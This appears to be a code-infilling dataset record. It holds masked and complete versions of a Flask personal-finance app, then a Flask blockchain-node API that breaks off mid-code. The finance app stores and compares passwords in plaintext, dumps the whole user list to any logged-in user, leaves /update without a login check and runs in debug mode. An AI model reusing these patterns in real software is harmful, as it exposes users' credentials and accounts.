0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n",
"step-5": "import os, datetime\r\nimport urllib\r\n\r\nfrom flask import (Flask, flash, json, jsonify, redirect, render_template,\r\n request, session, url_for)\r\n\r\nimport util.database as db\r\n\r\ntemplate_path=os.path.dirname(__file__)+\"/templates\"\r\nfile=\"\"\r\nif template_path!=\"/templates\":\r\n app = Flask(\"__main__\",template_folder=os.path.dirname(__file__)+\"/templates\",static_folder=os.path.dirname(__file__)+\"/static\")\r\n file = open(os.path.dirname(__file__)+'/data/keys.json')\r\nelse:\r\n app = Flask(\"__main__\")\r\n file = open('./data/keys.json')\r\n\r\napp.secret_key = os.urandom(32)\r\n\r\n\r\ncontent = file.read()\r\nkeys = json.loads(content)\r\n\r\n# has a 5000 calls/day limit\r\nPIXABAY_KEY = keys['Pixabay']\r\nPIXABAY_STUB = \"https://pixabay.com/api/?key=\" + PIXABAY_KEY + \"&q=\" #separate words with \"+\"\r\[email protected]('/')\r\ndef home():\r\n if \"username\" in session:\r\n id_num=db.search_user_list(session[\"username\"], is_usrname=True)[0][2]\r\n finavail=db.search_finance_list(id_num)\r\n goalavail=db.search_goal_list(id_num)\r\n if finavail:\r\n session[\"finances\"]=session[\"username\"]\r\n if goalavail:\r\n session[\"goals\"]=session[\"username\"]\r\n set_goal = db.search_goal_list(id_num)\r\n print(set_goal)\r\n if set_goal != []:\r\n user_id = db.search_user_list(session['username'], is_usrname=True)[0][2]\r\n g = db.search_goal_list(user_id)\r\n b = db.search_finance_list(user_id)\r\n t = db.search_time_list(user_id)\r\n date_now = datetime.date.today()\r\n price = g\r\n perc = g\r\n delta_months = 0\r\n if g != []:\r\n g = g[0][0]\r\n if price != []:\r\n price = price[0][1]\r\n if perc != []:\r\n perc = perc[0][2]\r\n ##function to get difference in months between 2 dates\r\n def months_between(date1,date2):\r\n if date1>date2:\r\n date1,date2=date2,date1\r\n m1=date1.year*12+date1.month\r\n m2=date2.year*12+date2.month\r\n months=m2-m1\r\n if date1.day>date2.day:\r\n months-=1\r\n elif date1.day==date2.day:\r\n seconds1=date1.hour*3600+date1.minute+date1.second\r\n seconds2=date2.hour*3600+date2.minute+date2.second\r\n if seconds1>seconds2:\r\n months-=1\r\n return months\r\n\r\n if t != []:\r\n t = t[0][0]\r\n delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))\r\n print(delta_months)\r\n\r\n img = db.search_image_list(user_id)\r\n if img != []:\r\n img = img[0][0]\r\n if b != []:\r\n bal = b[0][0]\r\n inc = b[0][1]\r\n print(b)\r\n print(g)\r\n print(price)\r\n print(perc)\r\n print(img)\r\n if g or price:\r\n if b:\r\n print(\"Used the first one\")\r\n perc_complete = (delta_months * (perc / 100.0) * inc)/price\r\n print(perc_complete)\r\n if perc_complete > 1:\r\n perc_complete = 1\r\n return render_template('home.html',fin=finavail,goal=goalavail, set_goal= set_goal, goal_name =g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )\r\n return render_template('home.html',fin=finavail,goal=goalavail)\r\n return render_template('home.html',fin=finavail,goal=goalavail)\r\n return render_template('home.html')\r\n\r\[email protected]('/register')\r\ndef register():\r\n return render_template('register.html')\r\[email protected]('/login')\r\ndef login():\r\n return render_template('login.html')\r\[email protected]('/auth', methods=['POST'])\r\ndef auth():\r\n user = request.form.get(\"user\")\r\n paswrd = request.form.get('pass')\r\n if request.form.get(\"submit\")==\"Register\":\r\n paswrd2 = request.form.get(\"pass2\")\r\n print(paswrd)\r\n print(paswrd2)\r\n if paswrd != paswrd2:\r\n flash(\"Passwords Do Not Match\")\r\n return redirect(url_for('register'))\r\n if db.register(user, paswrd):\r\n flash(\"Registered successfully\")\r\n session['username'] = request.form['user']\r\n else:\r\n flash(\"Unable to register the user\")\r\n return redirect(url_for('register'))\r\n print(\"Username has been registered previously!\")\r\n else:\r\n match=db.search_user_list(user, is_usrname=True)\r\n if len(match)>0:\r\n if match[0][1]==paswrd:\r\n session[\"username\"]=request.form[\"user\"]\r\n else:\r\n flash(\"wrong Password\")\r\n return redirect(url_for('login'))\r\n else:\r\n flash(\"User not found\")\r\n return redirect(url_for('login'))\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/finances')\r\ndef finance():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n items = db.search_finance_list(user_id)\r\n daily = db.search_expense_list(user_id, is_id=True)\r\n monthly = db.search_monthly_list(user_id, is_id=True)\r\n ratings = db.search_rating_list(user_id, is_id=True)\r\n print(ratings)\r\n print(f\"Unlike month, this is daily: {daily}\\n\")\r\n w = dict([ (x[0], x[1]) for x in daily ])\r\n s = dict([ (x[0], x[1]) for x in monthly ])\r\n r = dict([ (x[0], x[1]) for x in ratings ])\r\n print(f\"THIS is monthly: {monthly}\")\r\n print(f\"THIS is s: {s}\")\r\n print(f\"These are the ratings: {r}\")\r\n total = 0\r\n m_total = 0\r\n for x in w.values():\r\n total += float(x)\r\n for x in s.values():\r\n m_total += float(x)\r\n if items != []:\r\n bal,income,i = items[0]\r\n diction = {\"Balance\":bal, \"Income\":income}\r\n return render_template('findata.html',\r\n diction=diction,\r\n daily=w,\r\n months = s,\r\n total=total,\r\n mtotal = m_total,completed=True, ratings=r)\r\n return render_template('findata.html')\r\n\r\[email protected]('/fincalc', methods=['POST'])\r\ndef calc():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n # print(request.form)\r\n session[\"finances\"]=session[\"username\"]\r\n bal = request.form['balance'][1:]\r\n monthly = request.form['monthly-inputs']\r\n income = request.form['income'][1:]\r\n # print(request.form)\r\n s = request.form\r\n d_rates = request.form['daily-importance']\r\n m_rates = request.form['monthly-importance']\r\n print(d_rates)\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n daily_dict = json.loads(d_rates)\r\n monthly_dict = json.loads(m_rates)\r\n print(daily_dict)\r\n print(monthly_dict)\r\n\r\n dai_im = dict([x for x in daily_dict.values()]) # {expenseName: rating, expenseName2: rating, ...}\r\n mon_im = dict([x for x in monthly_dict.values()])\r\n file=os.path.dirname(__file__)+f'/static/ratings.csv'\r\n stringg = \"{\"\r\n try:\r\n with open(file) as f: # if readable, file already exists\r\n print(\"File found, not creating...\")\r\n f.close()\r\n except Exception as e:\r\n print(e)\r\n with open(file, 'a+') as f: # creates the file\r\n print(\"File not found, creating...\")\r\n f.write(f\"ratings,id\\n\")\r\n f.close()\r\n for item in mon_im:\r\n db.add_rating(item, mon_im[item], user_id)\r\n stringg += \"'\" + item + \"'\" + \" : \" + \"'\" + str(mon_im[item]) + \"'\" + \" \"\r\n\r\n for item in dai_im:\r\n db.add_rating(item, dai_im[item], user_id)\r\n stringg += \"'\" + item + \"'\" + \" : \" + \"'\" + str(dai_im[item]) + \"'\" + \" \"\r\n stringg += \"},\" + str(user_id) + \"\\n\"\r\n\r\n with open(file, \"r\") as f:\r\n lines = f.readlines()\r\n with open(file, \"w\") as f:\r\n for line in lines:\r\n if str(user_id) != line.strip(\"\\n\").split(\",\")[1]:\r\n f.write(line)\r\n f.write(stringg)\r\n f.close()\r\n daily = request.form['all-inputs']\r\n print(f\"This is daily: {monthly}\")\r\n daily = json.loads(daily) # dictionary\r\n monthly = json.loads(monthly)\r\n print(f\"This is daily now {monthly}\")\r\n w = dict([x for x in daily.values()]) # {expense1: $$$, expense2: $$$, ...}\r\n m = dict([x for x in monthly.values()])\r\n print(f\"\\nThis is calculated m:{m}\\n\")\r\n db.add_finances(bal, m, income, w, user_id)\r\n flash(\"Finances updated\")\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/goals')\r\ndef goals():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n g = db.search_goal_list(user_id)\r\n b = db.search_finance_list(user_id)\r\n t = db.search_time_list(user_id)\r\n date_now = datetime.date.today()\r\n price = g\r\n perc = g\r\n delta_months = 0\r\n if g != []:\r\n g = g[0][0]\r\n if price != []:\r\n price = price[0][1]\r\n if perc != []:\r\n perc = perc[0][2]\r\n ##function to get difference in months between 2 dates\r\n def months_between(date1,date2):\r\n if date1>date2:\r\n date1,date2=date2,date1\r\n m1=date1.year*12+date1.month\r\n m2=date2.year*12+date2.month\r\n months=m2-m1\r\n if date1.day>date2.day:\r\n months-=1\r\n elif date1.day==date2.day:\r\n seconds1=date1.hour*3600+date1.minute+date1.second\r\n seconds2=date2.hour*3600+date2.minute+date2.second\r\n if seconds1>seconds2:\r\n months-=1\r\n return months\r\n\r\n if t != []:\r\n t = t[0][0]\r\n delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))\r\n print(delta_months)\r\n\r\n img = db.search_image_list(user_id)\r\n if img != []:\r\n img = img[0][0]\r\n if b != []:\r\n bal = b[0][0]\r\n inc = b[0][1]\r\n print(b)\r\n print(g)\r\n print(price)\r\n print(perc)\r\n print(img)\r\n if g or price:\r\n if b:\r\n print(\"Used the first one\")\r\n perc_complete = (delta_months * (perc / 100.0) * inc)/price\r\n print(perc_complete)\r\n if perc_complete > 1:\r\n perc_complete = 1\r\n return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )\r\n else:\r\n print(\"Used the second\")\r\n return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img)\r\n else:\r\n if b:\r\n return render_template('goals.html', bal=bal, income=inc)\r\n else:\r\n return render_template('goals.html')\r\n\r\[email protected]('/gcalc', methods=['POST'])\r\ndef gcalc():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n goal_name = request.form['goal']\r\n goal_price = request.form['goal_price'][1:]\r\n percentage = request.form['slide']\r\n print(\"This is percentage:\")\r\n print(percentage)\r\n print(\"gcalc\")\r\n print(goal_name)\r\n print(goal_price)\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n db.add_goals(goal_name, goal_price, percentage, user_id)\r\n a = db.search_image_list(user_id)\r\n print(a)\r\n # optimization to save on api calls\r\n if a == [] or a[0][2] != goal_name:\r\n try:\r\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ', '+') + \"&image_type=photo\")\r\n p = json.loads(l.read())\r\n img = p['hits'][0]['webformatURL']\r\n except:\r\n return render_template('error.html', err=\"Cannot connect to API\", fix=\"Try refreshing or contacting the site owner\")\r\n else:\r\n img = a[0][1]\r\n db.add_images(img, goal_name, user_id)\r\n flash(f\"Goal for {goal_name} at ${goal_price} has been added!\")\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/sankey')\r\ndef sankey():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n return render_template('sankey.html',idnum=user_id)\r\[email protected]('/pie')\r\ndef pie():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n return render_template('pie.html',idnum=user_id)\r\[email protected]('/area')\r\ndef area():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n goal=db.search_goal_list(user_id)\r\n if goal == []:\r\n return redirect(url_for('goals'))\r\n daily=db.search_expense_list(user_id)\r\n monthly=db.search_monthly_list(user_id)\r\n dadict={}\r\n modict={}\r\n print(goal)\r\n ratings={}\r\n for names in daily:\r\n dadict[names[0]]=names[1]\r\n for names in monthly:\r\n modict[names[0]]=names[1]\r\n print(dadict,modict)\r\n percent=0\r\n for names in db.search_rating_list(user_id):\r\n print(names)\r\n if names[0] in modict:\r\n percent=(modict[names[0]]*12)/goal[0][1]\r\n if names[0] in dadict:\r\n percent=(dadict[names[0]]*30*12)/goal[0][1]\r\n if names[1]<=6 and percent >=0.05:\r\n ratings[names[0]]=(names[1],percent)\r\n print(ratings)\r\n return render_template('area.html',idnum=user_id,ratings=ratings)\r\[email protected]('/logout')\r\ndef logout():\r\n if 'username' in session:\r\n session.pop('username')\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/account')\r\ndef account():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n # print(db.search_user_list(session['username']))\r\n user_list = json.dumps(db.search_user_list(ret_all=True))\r\n print(json.dumps(db.search_user_list(ret_all=True)))\r\n return render_template('accounts.html', user_list=user_list)\r\n\r\[email protected]('/update', methods=[\"POST\"])\r\ndef update():\r\n print('this is the updates')\r\n update_dict = request.form['all-options']\r\n update_dict = json.loads(update_dict)\r\n print(request.form)\r\n user_ids = db.search_user_list(session['username'])\r\n user = user_ids[0][-1]\r\n print(user)\r\n db.update_user_list(update_dict['username'] or user_ids[0][0], update_dict['password'] or user_ids[0][1], user)\r\n db.reset_statistics(user, update_dict['reset'])\r\n session.pop('username')\r\n session['username'] = update_dict['username'] or user_ids[0][0] # change username in session\r\n flash(\"Account information updated successfully\")\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/del')\r\ndef delete():\r\n if 'username' not in session:\r\n flash(\"Woops. You can't be here\")\r\n return redirect(url_for('login'))\r\n user = db.search_user_list(session['username'])[0][-1]\r\n print(user)\r\n db.update_user_list(None, None, user, rem=True)\r\n flash(\"User successfully removed\")\r\n session.pop('username')\r\n return redirect(url_for('home'))\r\n\r\nif __name__ == \"__main__\":\r\n app.debug = True\r\n app.run()\r\n",
"step-ids": [
14,
15,
16,
18,
19
]
}
|
[
14,
15,
16,
18,
19
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from app import Node
from dbm2 import filemanager
fm = filemanager()
node = Node(fm)
app = Flask(__name__)
@app.route("/transactions/isfull",methods=['GET'])
def isFull():
return jsonify(node.isFull()), 200
@app.route("/transactions/new",methods=["POST"])
def newTransaction():
transaction = request.get_json()
if node.isValidTxn(node.isValidChain(),transaction):
return transaction, 200
else:
return jsonify(False), 200
@app.route("/chain/last",methods=["GET"])
def last_block():
return jsonify(node.getLastBlock()), 200
@app.route("/chain",methods=["GET"])
def get_chain():
return jsonify(node.chain), 200
@app.route("/pnodes/register",methods=["POST"])
def register_pnodes():
nodes = request.get_json()
print(nodes)
if type(nodes)==list:
if len(nodes)>10 and nodes!=[]:
nodes = nodes[:10]
s = [] #succeed
f = [] #failed
for addr in nodes:
if node.addPNode(addr):
s.append(addr)
else:
f.append(addr)
resp = {"Added PNodes":s,
"Not added pnodes":f}
return jsonify(resp), 200
resp = {"Error":"Input format error"}
return jsonify(resp), 400
@app.route("/pnodes/size",methods=["GET"])
def pnodes_size():
return jsonify(len(node.pnodes)), 200
@app.route("/nodes",methods=["GET"])
def get_nodes():
nodes = list(node.nodes)
return jsonify(nodes), 200
@app.route("/nodes/resolve",methods=["GET"])
def resolve_nodes():
added_nodes = node.resolveNodes()
if added_nodes:
return jsonify(added_nodes), 200
else:
return "0 nodes added",400
@app.route("/chain/resolve",methods=["GET"])
def resolve_chain():
r = node.resolveConflicts()
if r:
return jsonify(r), 200
else:
print("Nothing")
return jsonify(r), 400
@app.route("/mine",methods=["GET"])
def mine():
mb = node.mine()
resp = {"Mined_block":mb}
return jsonify(resp), 200
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p","--port",default=node.DEFAULT_PORT,type=int,help='port to listen on')
args = parser.parse_args()
port = args.port
node.port=port
app.run(host="",port=port)
|
normal
|
{
"blob_id": "45b46a08d8b304ac12baf34e0916b249b560418f",
"index": 7459,
"step-1": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\n<mask token>\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\n<mask token>\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-3": "<mask token>\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-4": "from flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n 